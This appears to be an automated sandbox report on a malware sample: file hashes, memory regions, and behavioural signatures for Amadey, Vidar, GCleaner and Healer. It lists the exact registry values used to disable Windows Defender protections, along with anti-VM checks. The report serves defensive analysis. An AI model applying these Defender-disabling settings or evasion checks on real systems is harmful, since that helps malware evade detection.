SHA512 be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE

MD5 03a574d64f0e62c5e117a5f5acf137e4
SHA1 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90
SHA256 dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747
SHA512 d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1

memory/1756-260-0x0000000006440000-0x0000000006892000-memory.dmp

memory/2944-259-0x0000000000900000-0x0000000000D52000-memory.dmp

memory/1756-258-0x0000000006440000-0x0000000006892000-memory.dmp

memory/2716-257-0x0000000006AB0000-0x0000000006F1A000-memory.dmp

memory/2944-280-0x0000000000900000-0x0000000000D52000-memory.dmp

memory/2944-279-0x0000000000900000-0x0000000000D52000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\30SMFKX3Q831TJGZG868.temp

MD5 54200432a451e4fa263abc6274ceeb41
SHA1 f65f6532098388e91c209baec0ceccf9e6d36808
SHA256 18ab5c4567b7f0a1b0e658a30139ccdc2cbc7d2b2376cc4837b435d0520de293
SHA512 addc696c78ee97b088ebcbaaf2ebfbb7994198856959b175de25f042d1de89f7e01b431a9e80f1cc878272292c78f114e5c6dd56401b0647915cb005ffd2c661

memory/2996-307-0x0000000000400000-0x000000000086A000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Temp\hWO8LyeS1.hta

MD5 16d76e35baeb05bc069a12dce9da83f9
SHA1 f419fd74265369666595c7ce7823ef75b40b2768
SHA256 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA512 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

memory/2716-324-0x0000000000C50000-0x0000000001119000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000007.dbtmp

MD5 18e723571b00fb1694a3bad6c78e4054
SHA1 afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA256 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA512 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

memory/2996-361-0x0000000000400000-0x000000000086A000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe

MD5 41e7a544f14c8eeda7675b6f8fc2f267
SHA1 98585d0462f44ace4216e00c0ae33f7b3606e0d4
SHA256 b5d4798fed8196e12260f2152245af80763fe877d807069d7f0ca08fd4ee6843
SHA512 6457c3a40dc56b82cf6eabb95d4591eab45aca0fff0bfeb03e20cc25a250b411cef072833bca7c1f58590bad4b10327bb364c1163896f0b2aaab6fde57a8e9ef

memory/2716-428-0x0000000006AB0000-0x0000000006DDE000-memory.dmp

memory/1644-429-0x0000000000920000-0x0000000000C4E000-memory.dmp

memory/2716-427-0x0000000006AB0000-0x0000000006DDE000-memory.dmp

\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

MD5 d433e1dc943e6ea29d67cf72d2f6fecd
SHA1 9964aa3e596d93673c4d84695dc94d6f1a9766cd
SHA256 a4c8487df15d27bad7699778b81dd6569c0b0e759bd0017f399b39cfa53bd1c5
SHA512 caab39684638d71e901b2915313c618baba27c015b0fc52c7503eb714dd4f9068bfadd30cd2d3e240ec925b003e9535e12ffdd5db3a610fcd056032ea925ca43

memory/628-467-0x0000000000FF0000-0x000000000131E000-memory.dmp

memory/1644-465-0x0000000000920000-0x0000000000C4E000-memory.dmp

memory/2056-478-0x00000000010C0000-0x00000000013E0000-memory.dmp

memory/2780-451-0x0000000006570000-0x0000000006890000-memory.dmp

memory/2056-450-0x00000000010C0000-0x00000000013E0000-memory.dmp

memory/2780-449-0x0000000006570000-0x0000000006890000-memory.dmp

memory/2944-502-0x0000000000900000-0x0000000000D52000-memory.dmp

memory/2716-545-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2996-567-0x0000000000400000-0x000000000086A000-memory.dmp

memory/2716-589-0x0000000006AB0000-0x0000000006DDE000-memory.dmp

memory/2716-588-0x0000000006AB0000-0x0000000006DDE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe

MD5 49a690607e1d76e6970b724c4fd22ec7
SHA1 4b670fc77c181e9afb3986729ee3b585bc460c3f
SHA256 0d7d5c2d601ffd78f5714d6149aef687e5edefcaf88bb9d2d529e69233220ef7
SHA512 54ae94f0bddeeef34e9c5cb1f9bebde49085807e0bb71015bac171ec9b73649ee85a799194ad9861da8221948e0e0e12d74346ad602d47e3d7781100f75d5f5b

memory/2912-625-0x0000000000A10000-0x0000000000D0F000-memory.dmp

memory/2716-626-0x0000000006AB0000-0x0000000006DAF000-memory.dmp

memory/2716-624-0x0000000006AB0000-0x0000000006DAF000-memory.dmp

memory/2912-651-0x0000000000A10000-0x0000000000D0F000-memory.dmp

memory/628-650-0x0000000000FF0000-0x000000000131E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091742001\022606d6b2.exe

MD5 1b7c22a214949975556626d7217e9a39
SHA1 d01c97e2944166ed23e47e4a62ff471ab8fa031f
SHA256 340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87
SHA512 ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5

C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe

MD5 03b33bee015493080376b643025fdf86
SHA1 bdadfa2adfc6d9c5413bcb2ac1d3b1918fb95bfd
SHA256 4acb822963132fd6bce9c8a61b8aa3d5015aadfd268717c1bf1c84ed3a8c809b
SHA512 6e758f621d5fd1d041e926b6bd607e670329def72e8b9ffb940e28a7ed77212f8e6a6eabf7d15e912ae842a990ebf6fc65779f64307fb86993fcd97790eeccf9

memory/628-702-0x0000000000FF0000-0x000000000131E000-memory.dmp

\Users\Admin\AppData\Local\Temp\10000370101\inet.exe

MD5 9d6f03d5a83f9ab0de52c69257720122
SHA1 407ce825de553f856059543cb20c2002f4b2b87d
SHA256 ab2c3bb1cf80ccd63b4e1be5b2aef4564542465e90f14e5110775658c6b7b9c6
SHA512 d937cb2599dd9a245e186a3f3d0efb786f9fbf5084c14878448f7454f175dc076d9af526a0f5ae24f75370247c70ae6e4f310d6d610f6ed4fdb2877b9c9468db

memory/628-714-0x0000000006B50000-0x0000000006FB0000-memory.dmp

memory/1804-713-0x0000000000400000-0x0000000000860000-memory.dmp

memory/628-712-0x0000000006B50000-0x0000000006FB0000-memory.dmp

memory/2716-719-0x0000000006AB0000-0x0000000006DAF000-memory.dmp

memory/2716-718-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2996-720-0x0000000000400000-0x000000000086A000-memory.dmp

memory/628-721-0x0000000006B50000-0x0000000006FB0000-memory.dmp

memory/1804-723-0x0000000000400000-0x0000000000860000-memory.dmp

memory/628-722-0x0000000000FF0000-0x000000000131E000-memory.dmp

memory/1804-724-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2716-743-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2996-744-0x0000000000400000-0x000000000086A000-memory.dmp

memory/2996-784-0x0000000000400000-0x000000000086A000-memory.dmp

memory/628-785-0x0000000000FF0000-0x000000000131E000-memory.dmp

memory/1804-786-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2708-790-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2716-789-0x0000000000C50000-0x0000000001119000-memory.dmp

C:\Windows\Tasks\Test Task17.job

MD5 5c7477b9c5f004c96d905ca251c16b58
SHA1 a1d57d7f2e0dcc6140d6d7a79ad0da59c544c11e
SHA256 85739875bdfaddd24be15a1046457e17cac757441804c627214973e8456a4b8e
SHA512 fa91684c3360c99a24875f2e29f566fea2b2743f749a4c6e4ca6942b967b7dd37013646359f4083affc004b3db915756b7a166f22628397eeb4fec98e8ee2753

memory/628-792-0x0000000000FF0000-0x000000000131E000-memory.dmp

memory/1804-793-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2708-796-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2708-795-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2716-794-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/628-797-0x0000000000FF0000-0x000000000131E000-memory.dmp

memory/1804-798-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2716-799-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2708-800-0x0000000000400000-0x0000000000860000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe

MD5 cf6bd1302ab35c1275fedadbabde12fa
SHA1 0b8f58dd6cc533ae2ac26abf9eac849962cbfeb1
SHA256 14738b35a925299846ccbaaae1e5002ad3eb4b63af8d08f517a8f916c99902e7
SHA512 c29182f551fe1538eddbb3b1f946073db2feabcfbe23729fbf8d6f72d3079a38f746af9cfa4f6db68d31bed038105a76a3dd381ce70cde5d181ebada16cc1b04

memory/628-815-0x0000000000FF0000-0x000000000131E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe

MD5 639af76cb7333cbd609da5d52a6e195b
SHA1 a1c8a3e99f11c72f0dcdfd75b75d6dbe9f266483
SHA256 a6e9b84cd1cdf3312a57f425bce1a490195864c5fae5ba5b0873c729ebbe11a8
SHA512 67510ef5a9dfa0d1dbf38d87a8f7b92b1dcd9e3979fc4632a19830875c5a86fa7261f8d11e86b506ebf7621352dc69093fb1a0e3432aa25118a1d6240c66de51

memory/1804-829-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2716-830-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2708-831-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2880-832-0x00000000009C0000-0x0000000001604000-memory.dmp

memory/2264-833-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2264-835-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2880-834-0x00000000009C0000-0x0000000001604000-memory.dmp

memory/2264-839-0x0000000010000000-0x000000001001C000-memory.dmp

memory/628-844-0x0000000000FF0000-0x000000000131E000-memory.dmp

memory/2652-845-0x0000000000E10000-0x0000000001848000-memory.dmp

memory/1548-848-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2652-847-0x0000000000E10000-0x0000000001848000-memory.dmp

memory/1804-850-0x0000000000400000-0x0000000000860000-memory.dmp

memory/1804-851-0x0000000000400000-0x0000000000860000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1LNUKNV0\success[2].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

memory/2716-853-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2708-854-0x0000000000400000-0x0000000000860000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091747001\ff28c3aaec.exe

MD5 db3632ef37d9e27dfa2fd76f320540ca
SHA1 f894b26a6910e1eb53b1891c651754a2b28ddd86
SHA256 0513f12c182a105759497d8280f1c06800a8ff07e1d69341268f3c08ecc27c6d
SHA512 4490b25598707577f0b1ba1f0fbe52556f752b591c433117d0f94ce386e86e101527b3d1f9982d6e097e1fcb724325fdd1837cc51d94c6b5704fd8df244648fd

C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe

MD5 f071beebff0bcff843395dc61a8d53c8
SHA1 82444a2bba58b07cb8e74a28b4b0f715500749b2
SHA256 0d89d83e0840155d3a4ceca1d514e92d9af14074be53abc541f80b6af3b0ceec
SHA512 1ac92897a11dbd3bd13b76bfeb2c8941fdffa7f33bc9e4db7781061fb684bfe8b8d19c21a22b3b551987f871c047b7518091b31fc743757d8f235c88628d121d

memory/2468-915-0x0000000001320000-0x00000000013D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe

MD5 69de9fb1f2c4da9f83d1e076bc539e4f
SHA1 22ce94c12e53a16766adf3d5be90a62790009896
SHA256 0df459c85df5ee90a32edcecd4c0519c00fcf9315b9a24edc132d8cf0f6c7ef8
SHA512 e9f2da39ecbb583943ae618097469e5d82953712b6cfdfa4b58fa4dcc2f683a7049aca4141b897ff1f6ab94d7bbaf21c7dec2e243c8632d46a55e15c363a9733

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\soft[1]

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

Analysis: behavioral2

Detonation Overview

Submitted

2025-02-24 13:38

Reported

2025-02-24 13:41

Platform

win10v2004-20250217-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
